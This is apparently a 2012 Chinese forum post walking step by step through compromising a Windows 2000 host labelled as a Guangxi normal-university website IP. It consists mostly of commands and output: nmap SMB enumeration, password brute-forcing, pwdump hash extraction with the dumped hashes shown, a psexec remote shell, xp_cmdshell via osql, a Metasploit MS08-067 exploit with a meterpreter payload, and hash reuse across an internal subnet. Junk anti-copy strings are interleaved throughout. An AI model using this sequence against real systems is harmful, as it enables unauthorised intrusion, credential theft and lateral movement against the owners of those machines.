广西师范网站http://202.103.242.241/
9 j" w9 x4 e7 l# N, ], i) M: k( V0 o9 O& |
root@bt:~# nmap -sS -sV 202.103.242.241
4 O6 i0 s W. D0 _! G8 f: S1 H/ H- R& t4 T
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST" L3 d& w( V I: y" _
, D( B c Z5 v1 q1 r
Nmap scan report for bogon (202.103.242.241)5 t1 X" ^ r6 d6 ?3 |% p
5 f% w2 v4 s2 w1 W
Host is up (0.00048s latency).
$ ~& O1 I9 Y4 x! ? \% i
6 y4 o6 f+ Z6 f) J& b% y# i PNot shown: 993 closed ports/ ?% Z, J6 o. @- E* W& r
2 z- j: ~( L3 O: t/ q% vPORT STATE SERVICE VERSION3 a3 C1 d4 E' Z' v! _' D! k
7 t! i; ?/ u% T4 h8 i+ N135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
9 H. w+ V9 _/ }9 U( N4 ]' \. V5 }+ I+ z
139/tcp open netbios-ssn
! F5 ?9 ^, V# ]7 h
x* t) H- F$ G. \- z445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds4 D$ k" u! V- |; l8 P
7 x7 i6 c8 ^% c3 F, Y3 n( k' o. W1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 ` Z! |8 s4 d2 m- Y: ~
" s, `. N. N7 w N2 l1026/tcp open msrpc Microsoft Windows RPC
- l9 O' l0 O K/ W, [5 t9 J
1 `. |! W7 X- D3372/tcp open msdtc?5 i# d2 r0 h* I& \+ y* _
: O, S, F/ v. X6 e
3389/tcp open ms-term-serv?) V; ~" u& s1 f$ \& f. x5 ^ b
$ t3 C6 R. w. U0 m5 H; E, y/ k1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :! r3 D( ^8 z1 P& d6 l
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
( S0 j# L2 b, q" _" l0 t2 P: c- z- Y ~ m1 V! L
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
& Y5 F p; I2 q5 o: Y8 A
9 q& v8 z9 K" I E* w- q# Z, WSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)( @6 `; k' b$ C
* G/ N* f" `* x$ [
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
6 ]8 H! ~( @3 U, ?/ f5 u' `
+ k; S2 P# y, ?8 i& n6 ^0 `* \SF:ptions,6,”hO\n\x000Z”);" Q X% J% Y. k' g" x+ o3 A
) V( U# ]; J v, R! a" O; OMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 y. v: r/ V' F+ I% m) [/ S3 e* _9 W. E! K. I; f# r
Service Info: OS: Windows
+ o; a/ ~$ _0 r, B& z, f9 P9 ]9 _/ d' a
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .2 a/ r% o' a/ \( o! L
6 A- K8 m8 B2 [8 k' i' f6 O2 M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
. G/ G! `% A$ E) \4 [5 S# L" X. W' l# M1 |& V
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本/ m2 D! o& t' \0 N' Q0 h' O
/ E+ b$ k' {3 X, \+ E! O7 n-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse K6 {# Q# k7 l8 p! w! z' N5 R% ?( J
2 Q) K7 S- [2 v9 F" J, N _-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
; F/ }9 e! t, ]+ r) W
$ Y3 y5 E! Z! ~2 g! b- L-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse$ a# q# p4 K J
/ y: h1 Z( h! x R. Z" a% j0 E
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse- r. ^; s/ d' D& Z; @
' H$ i3 @ w9 h" P, Y
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
, S* y& l ^; h0 ~6 v
+ K: O0 a: L( I( e: h, X-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse F+ [+ e$ k( f8 j
2 f1 v( L1 D d* u
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse$ d; K! @% d6 n6 e J
7 J! i3 F" m! _* M: i: S
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse+ T8 o% r0 K: o6 u% M* ?! f$ M0 d
! G4 V0 H8 m: D* x/ W5 k
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse9 u( I+ \# n5 b
* Y, |$ u, K4 E( p0 G-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse7 J; B8 C8 d- a \7 E8 m; X8 X5 o
8 k7 B: }& t' F8 x8 R-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
; b0 a! _( f& r$ ]! X& C' d+ O5 e {: ?4 `7 F
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
- u2 X+ I( l& B4 Y0 k# e' t" {; h5 @/ O" r$ Q, Z
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse2 z' f8 r* M8 `' T# f4 ]
% S# V4 S4 e) d: d' V
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse; F' o j/ {0 F2 Z+ O( Q
: Z' M. j z# ~/ u9 G% x-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse4 a$ ^$ y" j. C1 |3 }; ]2 K
" [( I2 [" N; z: |/ R% Froot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 2 m9 Q3 t- q/ v
" f+ h( J5 L* u. {. R1 p4 v//此乃使用脚本扫描远程机器所存在的账户名
+ g y, ]; Y |1 D3 g4 E- g* \1 u1 _/ p; S6 }! I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
/ Y" w2 q. B: B2 x) p4 i6 R9 v: T- o
Nmap scan report for bogon (202.103.242.241)
7 O" L/ Y# ~9 A- Y" k0 V" g
' X3 \ |; y: ]. n4 s/ sHost is up (0.00038s latency).
4 t S3 |# Z! F* k2 h: R! ?. O$ S: y" r, U& }3 Z! ^7 [) @
Not shown: 993 closed ports
2 L, {9 K2 w8 Y. y7 o* Y- C8 @+ }- l+ X9 H& d/ U
PORT STATE SERVICE
. g$ }1 [; k% a* A5 `* N' a
* h: Q8 J, s; S( a0 E5 D, ]135/tcp open msrpc
0 ^# Y/ f: b' t; E2 n/ k, A, l# n- x" m2 ~: ?6 G
139/tcp open netbios-ssn/ H0 p+ m) v, o
5 [' u0 w v( ~/ X, D" E# v9 w' `# ^445/tcp open microsoft-ds
& ?; s0 ~( Y$ G+ R1 h& C
& O% j: K4 G7 q) D6 N& @: i S1025/tcp open NFS-or-IIS1 }# R7 R3 o8 Q" d
3 M. B1 h3 ]* s. x5 S- O! M' ?
1026/tcp open LSA-or-nterm
" y: C6 C5 \) ~# |5 K1 Y. y4 s* c8 F
3372/tcp open msdtc: D/ ?, t+ L0 f' ?0 F2 A
& z8 @! y" v+ h* d2 D9 u
3389/tcp open ms-term-serv9 x; R7 h O* ]9 ?/ J; q
3 b; p1 O; A* i( T% }
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
% C+ W' W" S2 o! U2 r C6 h( I
' R0 `) l7 V+ |, z \Host script results:
6 ?) ]- _. @! k3 W
8 d1 d, `+ O$ {$ M' L: X| smb-enum-users:
" U8 o- ]+ g+ `% h1 O4 _; `* h4 e; B7 J+ N4 c5 z* M; a8 U2 p
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
- N4 B& T$ Y" q
) y# _1 A2 `, l& I# B( Y* WNmap done: 1 IP address (1 host up) scanned in 1.09 seconds$ p% [5 L" Q4 @! M) ^7 J# x
3 J( @1 y3 t w: z0 a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
2 P8 o1 ], g4 _7 W5 [, |; Z. S5 z" ]" K% e$ P) b4 J
//查看共享( H% J# }' P7 I5 @
. H: a) E G) l, N/ kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST, Q, K- `# F+ f1 m z
0 B( Z3 Q8 _6 X3 ~
Nmap scan report for bogon (202.103.242.241)
+ H. s+ Y4 B& m, \ ^& u2 K! Q/ E4 V! C5 L
Host is up (0.00035s latency).
( C, ^- n1 u6 I8 z l4 m1 P" y0 n$ r3 G
Not shown: 993 closed ports, g* ?) d! V1 |6 p& X- a7 r
+ [3 _0 j$ b0 V/ g. h& qPORT STATE SERVICE
& |5 B% _* U' o4 ~$ z, w# k
+ t4 T2 R3 R# b135/tcp open msrpc
* s2 I" G# R/ S9 b* B, U
; g" q' |4 i1 \( H) v! ~( f$ u139/tcp open netbios-ssn( B% V5 Z: W0 m
1 M* x/ r/ G3 n3 }445/tcp open microsoft-ds
: w9 H7 p2 T1 E9 X8 {) g6 n, S! Q# M( p( h. \1 x
1025/tcp open NFS-or-IIS! H: L# [+ J( ~- Q$ ~6 S5 \
1 J0 c( A# j. n0 U I1026/tcp open LSA-or-nterm% m3 B. E M% j
- `0 q" U$ C, }4 \# f0 C
3372/tcp open msdtc
$ A% W. l& T. L
2 C3 K& d8 l* [. Z5 e) z) m- T9 a3389/tcp open ms-term-serv7 t: z3 z M S+ F: N+ \! r* D
% I# R5 b/ P$ }. zMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)' T4 Q2 L1 P' _7 v3 m
3 V4 S0 S& M5 T" q: s* S
Host script results:
6 ?) f1 o9 z$ ^( I& e8 W- S% p/ S4 `+ {
| smb-enum-shares:9 _& O3 i9 N( X8 M( R* }- M# ]
0 E6 X2 X+ ^$ q% D+ ~| ADMIN$
# |6 y1 O$ w6 P, l/ @! N9 u1 J' a$ _. d8 ~+ k! b0 W
| Anonymous access: <none>
8 w6 g; ~7 v8 {
* F" C* _, c1 S* A| C$
" C# t% j. \" Y# F# |2 N5 K
5 s. U, K& d2 U/ v0 w. p| Anonymous access: <none>
' h+ W- ?6 M- b7 f
% ?# N6 D, _. H0 C| IPC$
' B- t: F) Z( r1 w1 ]% |3 @ J& K2 u/ p, M) j
|_ Anonymous access: READ
) s, }+ N- g% }3 }7 L5 C1 |; M+ i- x
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds! c2 _* O0 y, K0 s6 Z/ q% G9 Y
7 {' s6 B. X! _0 Kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 * G4 J% [! \3 A* d8 A6 Y
& N: E4 G$ T) P
//获取用户密码) T4 Z3 k* m Q7 n
1 u* ?- `) O! G, `
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST$ [$ I H# W6 }
) [* I- p+ d: R" Y. {
Nmap scan report for bogon (202.103.242.2418)
0 x: l# @5 r, r% a8 m) W4 Q$ {8 k1 @
Host is up (0.00041s latency).. Q ?+ t* F# I3 D" A; k
* N: H. r4 X3 _4 e" ^ V0 u1 ?, }Not shown: 993 closed ports! W6 N! c# h& {7 h- f6 O
1 |/ U5 h( C- M' G6 Q) b. U$ X8 |PORT STATE SERVICE1 u1 w% r3 P; u, N, c& j% }
1 Z$ k! u6 O- E3 w& @* y$ I* i8 x
135/tcp open msrpc' i. h. i7 q* h! F7 H6 T* E) ]
: L- A+ U2 D: W; g139/tcp open netbios-ssn- J5 U2 Z+ v5 ] t: {
/ R, x, ^* c* I4 ?3 `& i
445/tcp open microsoft-ds
; J# v0 F! f: j- v2 {- C
- d9 {( k2 V9 E) b; d' c! {# O1025/tcp open NFS-or-IIS
& K) F$ V( v1 _$ J( x; ?: f5 w( [5 s4 M6 [" T7 T
1026/tcp open LSA-or-nterm4 L# E9 I% I3 P4 O
2 ]$ H- D1 D8 K3372/tcp open msdtc
' D0 q" C# m) x9 V7 E/ o- j
+ {& ] O& L$ @/ D7 Z3389/tcp open ms-term-serv+ \! Y. f# f5 e" X
7 a9 q; z* G! n' tMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)( A% S+ f" j% f4 I. M
. z' C1 w+ a' S/ W) @( WHost script results:
: I% w3 p! ^2 O) a5 b0 g. ~5 Y2 T4 o+ O; M6 b W: ~" a
| smb-brute:+ E/ A6 l& b5 W% o
: g% T1 q9 p& A, _* _# k1 \
administrator:<blank> => Login was successful7 K( Y) e- a4 r" {% A% u' b9 w
# X4 S1 V% q# I( |$ U- _7 w|_ test:123456 => Login was successful
' h: l0 ]9 F+ w3 {0 k9 G
/ a2 _/ L) M$ @1 q7 d' kNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
3 ]: z( ~4 J) B" j6 x3 Q0 q2 q( ?8 D
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash: ]4 l/ Z1 z7 e
6 p1 l7 s6 x/ U" D9 ?& g: h/ J
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
' z _% i" l+ m. s1 w( K9 m Z
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
/ a# G$ p& ^, i4 d( J7 S
: \" ^1 Q- G( J% [root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
! c) S3 g7 [7 | L) A2 v# x
6 t% s. u5 O) s* lStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST. a. {' l: ~7 P. x( U6 E2 I
, ~% U6 B3 M3 F( X7 rNmap scan report for bogon (202.103.242.241)- N U$ r- K- l1 L, z9 d" h
0 @- q4 p7 v+ J+ L2 p* h }' KHost is up (0.0012s latency).
5 `4 f- T9 l( }" z/ _ N6 |- N- ]5 A1 A
PORT STATE SERVICE j3 J" |! v" G! x! ]
" G; z8 m% j2 T* k+ _2 p: d135/tcp open msrpc; x" U. W& M! s3 S6 e+ W5 W2 b" ~
9 ?& N9 M- B1 i: x; C139/tcp open netbios-ssn8 s+ v+ y3 x( o! l" d" j. ^6 i
* ^4 s- Y; V- r. ?& ?
445/tcp open microsoft-ds: b/ Z6 E+ i2 G- h& s+ Y0 T7 e% ~
' c9 E, M+ ~+ ~9 HMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)# @9 _0 L* g* ?; `
& p- K2 v2 q0 Q( H/ Z9 a2 b- F
Host script results:
0 Q6 \ u ~+ B( l, K
/ A i1 t7 z. H8 R& ^| smb-pwdump:. K' Q- D' {& L$ [* I/ p
4 H$ n9 A) b. \5 S4 A| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
" ~& h5 k( T: x$ x" h0 s- Q% z+ z- J6 g8 i* D; W/ s; K
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
- l6 |) ?/ | H& L0 A1 H, D. W9 n' z/ P; j7 S4 ]
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D48 I9 k/ g* X: @9 h j
& @# L L$ s1 O4 p: V9 E; {1 e, i4 p
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2# m- i1 b5 C) h3 T3 I% M
% X. P* x L6 E8 BNmap done: 1 IP address (1 host up) scanned in 1.85 seconds: a$ ^; Q: H& A8 Z, @3 J ` t
# x0 M: u+ E4 ]( k2 FC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
/ X8 C9 G. X% a% r# b& @4 f
+ {2 j& S/ x* K) O0 {-p 123456 -e cmd.exe
A6 f% J6 @* f1 i. b5 m5 _
% S [7 ]. K1 sPsExec v1.55 – Execute processes remotely
( d1 D: j( j; _. q2 A- Z
1 p& X0 Z& a8 `3 dCopyright (C) 2001-2004 Mark Russinovich
2 Y: [# P. C5 u+ \+ j) k- c3 F$ i" M+ j
Sysinternals – www.sysinternals.com
n0 `) B. P H# l
# J5 g' l$ F) U& KMicrosoft Windows 2000 [Version 5.00.2195]& ~/ H0 y; J- m z0 N
u# v$ Z! N1 M/ E( }3 A
(C) 版权所有 1985-2000 Microsoft Corp.
5 W: Q9 ]5 |; ^
( C( N1 Q2 W! s% j! TC:\WINNT\system32>ipconfig; {3 M* r( N2 ^5 `
% g' _% l- ^$ Z3 }
Windows 2000 IP Configuration
( U. R! Y: T# N) l+ T7 A3 ~, ?9 I6 ~8 J
Ethernet adapter 本地连接:
9 [0 }1 Q7 V" y
6 \+ [9 t. Y% |! B* J5 i) @4 LConnection-specific DNS Suffix . :
. m& e; n4 H7 y2 u$ e, z( S8 |
0 n) w! V u; Y+ n9 ?# I% wIP Address. . . . . . . . . . . . : 202.103.242.241
. R' q* h9 o# t% }/ a3 L6 d& O) x0 m0 ]" y
Subnet Mask . . . . . . . . . . . : 255.255.255.0, N( n# u2 A: P: |) c6 E
! {6 O$ L D* ~, |7 j" H
Default Gateway . . . . . . . . . : 202.103.1.1
7 m% r- ~, n$ d! C
) t, T# O/ N) E' `: d3 y% u' bC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令5 e# E5 @" `# R* {
; \8 n7 M' ~- z( i- d! s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
9 r6 r: F R) b, m% ^: A& G4 r/ m p* W; S4 ]' w6 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST% M: o7 e8 z1 B
# l) C6 L/ W- W# t P! Y
Nmap scan report for bogon (202.103.242.241)
" Z' y$ }2 z3 E/ E+ {: ^2 _
# R& _. a7 l; W7 t& bHost is up (0.00046s latency).4 J$ E( G2 ?3 p8 T4 n
# f+ ]+ B1 G+ h6 @- o0 a! `8 oNot shown: 993 closed ports: q2 U5 Y) w8 _
6 J* R0 f- Z, k4 l3 R* p: _* _
PORT STATE SERVICE% Y# E9 K' O) s# w; H1 W8 U [7 F
' R8 K; D% q/ U9 z( |
135/tcp open msrpc
7 V A/ G) H: L* o$ j; m* _' o- T! E+ f% I: Y5 L
139/tcp open netbios-ssn
7 @8 f! ^5 S) Q) y K) z- z# x. Z1 R# E; s6 ` v. S8 L
445/tcp open microsoft-ds
( K3 H5 A* R/ J7 f$ r: |+ S8 b( t/ [3 q. _" b' J5 ^3 v
1025/tcp open NFS-or-IIS. g7 C( G' c0 r. ~- A" O
. M; q6 x3 e2 Y" H; }
1026/tcp open LSA-or-nterm
( F: h( n/ `+ J" b7 d4 ?" B, m. a& P8 n
3372/tcp open msdtc
C# \. |# E* @4 G3 r7 x" W0 z2 h: t% R5 A9 V9 W; r( N
3389/tcp open ms-term-serv
6 r4 N" C+ f9 U# n- b2 k4 w/ v
& l. p/ O" \3 d, D; v4 F* r) AMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
" {' ~0 c9 K0 K" N: h7 V$ c* Z
Host script results:/ Z6 r& H. ^" a
; H+ V# C, Z; U4 A. \1 ]| smb-check-vulns:, V/ }5 s @2 W* e" w
" T5 }' _- }. \( d0 i6 n
|_ MS08-067: VULNERABLE
1 G% @* T3 ~& l& f" a, L
4 G5 f6 ~; N* O2 o$ F8 ], PNmap done: 1 IP address (1 host up) scanned in 1.43 seconds! b) i; i7 q9 N# T
3 l. ~; W# g f8 F$ ]
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出0 X) f/ Z* s' `, x, o( i
" k8 y' @# m3 @8 H0 Gmsf > search ms08
' C# M% w4 d* D8 H1 j( P% ]) g' i I$ w) i& P. ^
msf > use exploit/windows/smb/ms08_067_netapi& P8 r0 l) h& \& ?. h- |6 a
* }% n- {' M, \$ T" s1 r8 q
msf exploit(ms08_067_netapi) > show options( p: d1 e) ?* H' c3 Q3 c& s
0 R( i2 G! K1 R, h+ B6 [8 {% ~msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241' e' V( ~" v/ p' Y2 i( }
( Y% C) q+ W/ ^! q; t8 B8 V
msf exploit(ms08_067_netapi) > show payloads" S8 o) S; E$ V9 _! |
: i, }$ r) O6 k
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
# ]3 U. a4 A2 B4 f9 {( c1 O7 f, F" l$ Z2 @% s* M* H: F
msf exploit(ms08_067_netapi) > exploit
# X p! Z9 X7 v& }" m7 U: t" t8 p( ~
$ j. M- h! @* O# G/ Bmeterpreter >
; T( P7 z! d! K3 T4 @
8 o- ]! U2 h: h/ MBackground session 2? [y/N] (ctrl+z)
/ D; H5 {5 G( j. q- L! a: M% Y6 ~2 k# J8 r4 U% ]
msf exploit(ms08_067_netapi) > sessions -l$ u \, d6 y E3 N
* {) D3 _. e; S# Q9 Y4 troot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
0 L- y7 S* c( K8 x8 W ~% Q- {6 N* @ C b0 F1 w
test
9 y, d* H4 p8 _, X: T0 c" E- I( \1 i1 E8 X2 j# r S$ i9 ~) d; {. q
administrator; k& u7 ^; ~4 H
! @5 T# L! ?: }( ?6 S" aroot@bt:/usr/local/share/nmap/scripts# vim password.txt8 |4 K8 D0 t, j
* {5 P3 Q' ~: ^2 |4 A. b) Q
44EFCE164AB921CAAAD3B435B51404EE8 U- g6 n- P1 z0 o
3 M( s1 n3 O$ W3 w$ n
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
7 K" f8 l9 W S" V! `* R% Y, [/ p$ e/ f
//利用用户名跟获取的hash尝试对整段内网进行登录 ^' C/ t9 ]$ a' K8 p; z) q
! c8 X8 x8 K8 o/ I/ [- [
Nmap scan report for 192.168.1.105! }2 Y4 @" t+ {# h$ V
' g; l# D) C$ \/ m5 d# iHost is up (0.00088s latency).( |" o% |+ V& |* H2 n$ `6 t6 z
; @! C* F. H3 L3 q" YNot shown: 993 closed ports' t! ]0 {4 h- Q, Y$ w
2 p5 h- R/ x/ ]/ E# O
PORT STATE SERVICE
% F" W) {9 O$ e! ]( c
( m3 Y# J y" J1 E" x: u135/tcp open msrpc0 d0 p+ n/ M5 y
6 A( f2 s8 W6 }, j! }# I
139/tcp open netbios-ssn
- ?) `" e D _& p6 B0 x3 I( _% W( D k/ o8 N
445/tcp open microsoft-ds
1 h' b1 ]$ \2 e- S# z; t# c( r! g4 D& J$ [' A
1025/tcp open NFS-or-IIS
; |5 j) g9 i- J( H3 d9 u) r9 `- K9 [- x
1026/tcp open LSA-or-nterm5 l9 W) c) C1 @# R2 }" z
* K+ f/ p% ^0 w) p' j
3372/tcp open msdtc
/ _& v; U0 w8 D! `3 r
& C" z; }7 b) u# F/ I3389/tcp open ms-term-serv
1 j* ^1 s. D( m- n8 S9 R& D% T% n0 D0 H9 R
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ F; E4 }# S# f9 s
* R$ j* n; L% Q; Z+ }, v8 XHost script results:( [6 }( M0 ]0 \* ^0 K
" n4 T5 G9 I4 k9 b- y% M* h4 U
| smb-brute:
# W5 F- N6 M2 a' {! C5 h9 h, {, z2 G3 H' C& S/ R( {
|_ administrator:<blank> => Login was successful4 d6 p5 x/ G4 m j' a
/ }) C v) m0 x+ F5 c9 E; j
攻击成功,一个简单的msf+nmap攻击~~·) k! E* Z% _' x. T% K2 i5 `) }
8 A* z* f; @/ u' B$ c9 l2 ~ |